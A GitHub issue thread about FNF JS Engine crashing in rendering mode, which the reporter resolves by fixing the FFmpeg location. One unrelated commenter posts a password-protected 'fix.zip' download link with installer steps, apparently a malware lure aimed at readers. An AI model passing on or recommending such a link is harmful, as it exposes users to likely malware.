### ISSUE TITLE
Render Mode Failure

### ISSUE THREAD

**Issue by TofpFL** [JordanSantiagoYT/FNF-JS-Engine#524]
### Describe your bug here. If you are modding, try testing your bug in a clean version of the engine instead. Also, if you're using an older version of JSE, please try the latest version/action build. Also, be sure to check the pinned 'JS Engine: Known Issues' issue, to check if your issue hasn't already been found!

Everytime I enable rendering mode and click on a song to play, the engine closes by itself. I can send you a unlisted YT video here: https://youtu.be/VR2dqMUEGK4

### Have you identified any steps to reproduce the bug? If so, please describe them below in as much detail as possible. Use images if possible.

```bash
Activate Rendering mode, go to Freeplay, and then click on the song.
```

### Are you modding a build from source or with Lua?

Lua

### What is your build target?

Windows

### Did you edit anything in this build? If so, mention or summarize your changes.

No

### If you use 1.12.0 or earlier, did you have Optimized Chart Loading turned on?

None

### Did you check for any similar issues to what you're reporting? Check, then come back here. If there is a similar issue, then do not report the issue, otherwise it will be marked as a duplicate.

No

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JordanSantiagoYT** [comment]
this exact crash has been reported **many** times.

try to go in the visuals & ui menu and reset/change your noteskin/splash skin options.

if it still crashes idk what to tell you, it's not crashing for me

**Comment by TofpFL** [comment]
ok i did change the ffmpeg version and updated a couple of personal visual settings. MY PREDATOR HELIOS 300 RENDERED ULTRASOUND IN 4 MINUTES!

**Comment by TofpFL** [comment]
Ok I fixed the bug lmao FFMPEG was in another location of another JS Engine sdjpiauhfquiwnqwoief
